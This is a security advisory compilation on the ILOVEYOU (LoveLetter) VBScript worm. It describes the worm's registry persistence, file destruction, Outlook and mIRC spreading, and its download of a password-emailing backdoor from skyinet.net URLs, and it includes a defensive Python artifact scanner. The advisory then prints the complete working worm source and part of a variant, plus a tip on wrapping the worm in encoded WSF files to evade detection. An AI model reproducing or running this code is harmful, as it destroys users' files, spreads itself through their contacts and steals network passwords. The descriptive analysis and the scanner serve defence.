COMMAND

    ILOVEYOU (worm)

SYSTEMS AFFECTED

    Almost any MS Windows based system

PROBLEM

Huh... Due to the big mess this worm created, here is the information about it. A dangerous Visual Basic Script (VBScript) virus, dubbed the "LoveLetter" or "ILOVEYOU" virus, has been spreading itself across the Internet through email via Microsoft Outlook and through Internet Relay Chat (IRC) using a popular IRC client named mIRC. The virus is susceptible to activation whenever the Windows Script Host features are enabled (this description is from the ISS advisory). Mail servers may incur mild to severe overloading and could crash when flooded with an unexpected number of the ILOVEYOU messages.

The actual VBScript code performs a number of destructive tasks:

- modifies and creates various Windows registry entries
- launches Internet Explorer to download a backdoor program which, once installed, captures network passwords and emails this data to an account in the Philippines
- infects the local machine by creating many new copies of itself and overwriting or hiding data files of specific file types (including VBScript, JavaScript, JPEG, and MP2/MP3)
- spreads itself to other users by using information from the Microsoft Outlook Address Book, as well as mIRC's DCC feature, which allows chat participants to exchange files

Visual Basic Scripts can be executed if Windows Script Host (WSH) is installed and enabled. Windows Script Host is installed by default with Windows 98 and with Internet Explorer version 4.0 and later.

The message is very identifiable. The subject is always "ILOVEYOU", and the body of the email only contains the message "kindly check the attached LOVELETTER coming from me." The email contains a single instance of the virus in the form of an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs".

For each address list that is found, a counter is kept in the registry to track the number of users that have been mailed. The number of email addresses in the address list is also recorded. If the number of addresses in the list increases, the virus will enumerate the individuals again and send out the "ILOVEYOU" mail to those who have not previously received it. All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB.

The virus uses Internet Explorer to connect to one of four HTTP web locations in an attempt to download a backdoor program called WIN-BUGSFIX.EXE. This backdoor program captures any network passwords it identifies and automatically emails this information to a mail account in the Philippines, controlled by the author of the virus. Before Internet Explorer is launched, the following registry entry, which sets the Internet Explorer start page, is changed to one of four URLs at random:

    \Software\Microsoft\Internet Explorer\Main\Start Page

After the executable is downloaded, the start page value is set to "about:blank". The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time:

    \Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE

It seems the WIN-BUGSFIX.exe file will email any cached passwords to MAILME@SUPER.NET.PH. Zoa_Chien points out that the WIN-BUGSFIX.exe program connects to the SMTP server at 199.108.232.1 port 25 to send out its email message. You should block the address at your firewall. The message looks as follows:

    To: mailme@super.net.ph
    Subject: Barok... email.passwords.sender.trojan
    X-Mailer: Barok... email.passwords.sender.trojan---by: spyder

    Host: kakker
    Username: Default
    IP Address: 10.67.101.123

    RAS Passwords:

    Cache Passwords:
    BLABLA\MPM : xxx
    BJORN\MUSIC : xxx
    TOM\SHARED : xxx
    TOM2\MP3 : xxx
    www.server.com/ : xxx:xxx
    MAPI : MAPI

where all xxx's stand for plaintext usernames and passwords of SMB shares in the subnet.

The virus identifies any "Fixed" or "Removable" drives connected to the system and recursively visits each folder, overwriting files of any of the following extensions with a copy of itself, changing the extension to ".vbs" and deleting the original file:

    vbs - Visual Basic Script
    vbe - Visual Basic Script (Encoded)
    js  - JavaScript
    jse - JavaScript (Encoded)
    css - Cascading Style Sheets
    wsh - Windows Script Host
    sct - Scriptlet file
    hta - HTML Application

The virus deletes any .jpg and .jpeg compressed image files, and replaces them with a copy of the virus with ".vbs" appended to the end of the original file name. Original copies of any MP3 or MP2 audio files found are preserved, but a copy of the virus is created using the same file name with ".vbs" appended. The original MP2/MP3 file's attributes will be changed so the file is hidden.

If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini", or "mirc.hlp" are found, a new default initialization script named "script.ini" is created in the same directory:

    [script]
    ;mIRC Script
    ; Please dont edit this script... mIRC will corrupt, if mIRC will
    ; corrupt... WINDOWS will affect and will not run correctly. thanks
    ;
    ;Khaled Mardam-Bey
    ;http://www.mirc.com
    ;
    n0=on 1:JOIN:#:{
    n1= /if ( $nick == $me ) { halt }
    n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
    n3=}

This script will attempt to send a copy of the pre-generated HTML page to any user who is seen joining any channel you are in on IRC.

Steve Wolfe posted a brief analysis of the "iloveyou" worm. The virus proliferates itself via email, sending letters with the subject "ILOVEYOU", and in the body, "kindly check the attached LOVELETTER coming from me." Attached is a VBScript file called "I-LOVE-YOU.TXT.vbs". The capitalization is apparently an attempt to fool users: if they are not looking carefully, upon seeing the ".TXT", they think the file is a (safe) text file, and run it. Once executed, the script does the following:

1. If the key "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout" is set to a positive number in the registry, it is set to zero. If it is not present, it is not affected.

2. The VBScript then saves a copy of itself to:
   (a) \%%WINDIR%%\Win32DLL.vbs
   (b) \%%SYSDIR%%\MSKernel32.vbs
   (c) \%%SYSDIR%%\LOVE-LETTER-FOR-YOU.TXT.vbs

3. Sets the appropriate registry entries to start it on boot:
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 => (b)
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL => (a)

4. Changes the MSIE home page to a presumably malicious URL. If the file "WinFAT32.exe" exists, then it sets the startup page (contained in the registry setting HKCU\Software\Microsoft\Internet Explorer\Main\Start Page) to one of the following URLs:
   http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
   http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
   http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
   http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe

5. If the "WIN-BUGSFIX.exe" file exists, it then sets it to run at boot:
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX => (download directory)\win-bugsfix.exe
   and also sets the MSIE startup page to about:blank (a blank page).

6. It then prints out HTML, containing these messages: "This HTML file need ActiveX Control To Enable to read this HTML file - Please press #-#YES#-# button to Enable ActiveX".

7. The ActiveX then sets the registry entries to make it run at boot, as in step 3, and writes the files as in step 2.

8. The virus spreads itself. It opens up a MAPI connection to your Outlook address list, and sends a copy of itself to each of the entries.

9. Enumerates disk drives and infects files. In infecting the files, it searches each of the drives found, and does the following:
   (A) Any file with the extensions .vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, or .jpeg is replaced with a copy of the virus. Then, it appears that a copy of the virus is also written to the name of the file with ".vbs" attached; for example, "logo.jpg" would be replaced with the virus, and a file called "logo.jpg.vbs" would be created as well.
   (B) If any file with the extensions .mp2 or .mp3 is encountered it will mark that file as hidden, then it will create a copy of itself with that name with the .vbs extension; for example, "macarena.mp3" would be hidden, and a copy of the virus written to "macarena.mp3.vbs".
   (C) If mirc32.exe, mirc.ini, script.ini, mirc.hlp or mlink32.exe is encountered it will write to the script.ini in that directory, and modify it so that anyone joining a channel will be automatically sent a copy of LOVE-LETTER-FOR-YOU.htm, containing the virus.

It seems a couple of variations of the worm are going around. At least one uses a subject line of "Joke" or "fw: Joke" and the attachment is called VeryFunny.vbs, or the one that talks about Mother's Day.
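As an added triage aid (not part of the advisory or of the quoted analyses), the following Python script walks a directory tree and reports, without deleting anything, the file-system artifacts the steps above describe; the dropped file names, the companion-file pattern and the script.ini marker strings are taken from the analysis, and the sample tree it builds is constructed demo data.

```python
"""Triage scanner for LoveLetter/ILOVEYOU file-system artifacts.

Added example, not part of the advisory or of the quoted analyses. Given a
directory tree (a copy of the victim's drive, or the drive mounted on an
analysis box) it reports, without deleting anything, the artifacts the
steps above describe: dropped copies of the script, companion ".vbs" files
left beside hidden MP2/MP3 files or in place of JPEGs, script.ini files
rewritten to DCC-send the HTML dropper, and any script or HTML file that
carries the worm's "rem barok -loveletter" header. The demo tree it builds
is constructed sample data.
"""
import os
import tempfile

# Names the worm drops (original, "fwd: Joke" and Mother's Day variants).
DROPPED_NAMES = {
    "mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs",
    "love-letter-for-you.htm", "very funny.vbs", "very funny.htm",
    "mothersday.vbs",
}
# Originals that get ".vbs" appended to the whole file name (logo.jpg.vbs).
COMPANION_EXTS = {".jpg", ".jpeg", ".mp2", ".mp3"}
# First line of the worm; it survives in the HTM dropper because it contains
# none of the characters the html() routine substitutes. Encoded .vbe copies
# will not match a plaintext search.
WORM_MARKER = b"rem barok -loveletter"
# Lines the worm writes into mIRC's script.ini.
MIRC_MARKERS = (b"/.dcc send $nick", b"love-letter-for-you.htm", b"very funny.htm")


def _head(path, limit=65536):
    """Lower-cased first `limit` bytes of a file, or b'' if unreadable."""
    try:
        with open(path, "rb") as fh:
            return fh.read(limit).lower()
    except OSError:
        return b""


def classify_file(path):
    """Return a list of (indicator, path) tuples for one file; [] if nothing matches."""
    findings = []
    name = os.path.basename(path).lower()
    stem, ext = os.path.splitext(name)
    if name in DROPPED_NAMES:
        findings.append(("dropped-copy", path))
    # "macarena.mp3.vbs": the stem itself still ends in a media extension.
    if ext == ".vbs" and os.path.splitext(stem)[1] in COMPANION_EXTS:
        findings.append(("companion-vbs", path))
    if ext in (".vbs", ".vbe", ".htm", ".html") and WORM_MARKER in _head(path):
        findings.append(("worm-body", path))
    if name == "script.ini" and any(m in _head(path) for m in MIRC_MARKERS):
        findings.append(("mirc-dcc-script", path))
    return findings


def scan_tree(root):
    """Walk root and return sorted (indicator, path relative to root) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            for indicator, hit in classify_file(full):
                findings.append((indicator, os.path.relpath(hit, root)))
    return sorted(findings)


def make_demo_tree():
    """Build a constructed sample tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="loveletter-demo-")
    stub = b"rem barok -loveletter(vbe) <demo stand-in, not the worm>\r\n"

    def put(rel, data):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)

    put("WINDOWS/SYSTEM/MSKernel32.vbs", stub)           # dropped copy
    put("music/macarena.mp3", b"ID3 sample")             # original (hidden on Windows)
    put("music/macarena.mp3.vbs", stub)                  # companion written beside it
    put("pics/logo.jpg.vbs", stub)                       # JPEG replaced, original deleted
    put("mirc/script.ini", b"[script]\r\nn0=on 1:JOIN:#:{\r\n"
        b"n2= /.dcc send $nick C:\\WINDOWS\\SYSTEM\\LOVE-LETTER-FOR-YOU.HTM\r\nn3=}\r\n")
    put("docs/readme.vbs", b"' harmless admin script\r\nWScript.Echo 1\r\n")
    put("docs/clean.mp3", b"ID3 sample")
    return root


if __name__ == "__main__":
    demo = make_demo_tree()
    for indicator, rel in scan_tree(demo):
        print("%-16s %s" % (indicator, rel))
```

Registry entries and the hidden attribute on MP2/MP3 originals are not visible from a mounted copy, so those still need checking on the live system.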
You can find the source of the original worm at: http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1 Here it is: rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) 
att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if 
(int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? 
March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# -#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite 
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub

ISS and others have become aware of several other variants of this virus, as shown below. Please note that modifying the virus is trivial and that new versions may be distributed at any time.

- Subject: fwd: Joke
  Attachment: Very Funny.vbs

- Subject: Susitikim shi vakara kavos puodukui...
  Body: kindly check the attached LOVELETTER coming from me.
  Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs

- Subject: Mothers Day Order Confirmation
  Body: We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep it in a safe place. Thanks Again and Have a Happy Mothers Day! mothersday@subdimension.com
  Attachment: mothersday.vbs

When the attachment is opened, the malicious VBScript code launches, performing the following operations in sequence:

- The virus removes the timeout associated with the Windows scripting unit by changing the value of the HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout registry key.

- The virus copies itself to SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs, and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs.

- The following registry entries are created under HKEY_LOCAL_MACHINE, such that the MSKernel32.vbs and Win32DLL.vbs copies will be launched at boot-time:
      \Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
      \Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
  Win32DLL.vbs is created as a service.

- An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for later use (in the mIRC script) and placed in the Windows SYSTEMDIR. Typically, WINDIR is C:\WINDOWS and SYSTEMDIR is C:\WINDOWS\SYSTEM.

- The virus attempts to spread itself via e-mail using Microsoft Outlook. It sends a message to all addresses found in every address book. Each individual is flagged in the registry after they have been sent a copy. For each address list that is found, a counter is kept in the registry to track the number of users that have been mailed. The number of email addresses in the address list is also recorded. If the number of addresses in the list increases, the virus will enumerate the individuals again and send out the "ILOVEYOU" mail to those who have not previously received it. All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB.

- The virus uses Internet Explorer to connect to one of four HTTP web locations in an attempt to download a backdoor program called WIN-BUGSFIX.EXE. This backdoor program captures any network passwords it identifies and automatically emails this information to a mail account in the Philippines, presumably controlled by the author of the virus. The original download locations for the WIN-BUGSFIX.EXE file seem to be invalid. Be aware that modified versions of the virus may point to valid copies of the backdoor, so this is still a threat. Before Internet Explorer is launched, the following registry entry, which sets the Internet Explorer start page, is changed to one of four URLs at random:
      \Software\Microsoft\Internet Explorer\Main\Start Page
  After the executable is downloaded, the start page value is set to "about:blank". The Mother's Day variation of the virus does not attempt to install the backdoor, but does modify the Internet Explorer start page.

- The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time:
      \Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE

- The virus identifies any local or network drives connected to the system and recursively visits each folder, overwriting files of any of the following extensions with a copy of itself, changing the extension to ".vbs" and deleting the original file:
      vbs - Visual Basic Script
      vbe - Visual Basic Script (Encoded)
      js  - JavaScript
      jse - JavaScript (Encoded)
      css - Cascading Style Sheets
      wsh - Windows Scripting Host
      sct - Scriptlet file
      hta - HTML Application
  The virus deletes any ".jpg" and ".jpeg" compressed image files, and replaces them with a copy of the virus with ".vbs" appended to the end of the original file name. The Mother's Day variation of the virus removes files of type ".ini" (Windows script files) and ".bat" (DOS batch files) instead of ".jpg" and ".jpeg". Original copies of any MP3 or MP2 audio files found are preserved, but a copy of the virus is created using the same file name with ".vbs" appended. The original MP2/MP3 file's attributes will be changed so the file is hidden.

- If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini", or "mirc.hlp" are found, a new default initialization script named "script.ini" is created in the same directory:
      [script]
      ;mIRC Script
      ; Please dont edit this script... mIRC will corrupt, if mIRC will
      ; corrupt... WINDOWS will affect and will not run correctly. thanks
      ;
      ;Khaled Mardam-Bey
      ;http://www.mirc.com
      ;
      n0=on 1:JOIN:#:{
      n1= /if ( $nick == $me ) { halt }
      n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
      n3=}
  This script will attempt to send a copy of the pre-generated HTML page to any user who is seen joining any channel you are in on IRC.

Sean Malloy lets us know that changing the virus to use a WSF extension instead of VBS is just as effective. WSF stands for Windows Scripting File. Antivirus vendors that want to be proactive might want to add this extension to their signatures. The file contents would look something like this:

    <job id="iloveyou">
    <script language="VBScript">
    'insert code here
    </script>
    </job>

or, as Sean points out, you could encode it to obfuscate it by doing:

    <job id="iloveyouencrypted">
    <script language="VBScript.Encode">
    #@~^EQAAAA==vbxd^?DDPmKN^?~t^?DnOwYAAA==^#~@
    </script>
    </job>

where "#@~^EQAAAA==vbxd^?DDPmKN^?~t^?DnOwYAAA==^#~@" is the encoded worm.

It seems the "fwd: Joke" variant attachment is "Very Funny.vbs" (note the space) and not "VeryFunny.vbs". Or maybe it's a new variant.
Very Funny.vbs: rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\Very Funny.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" 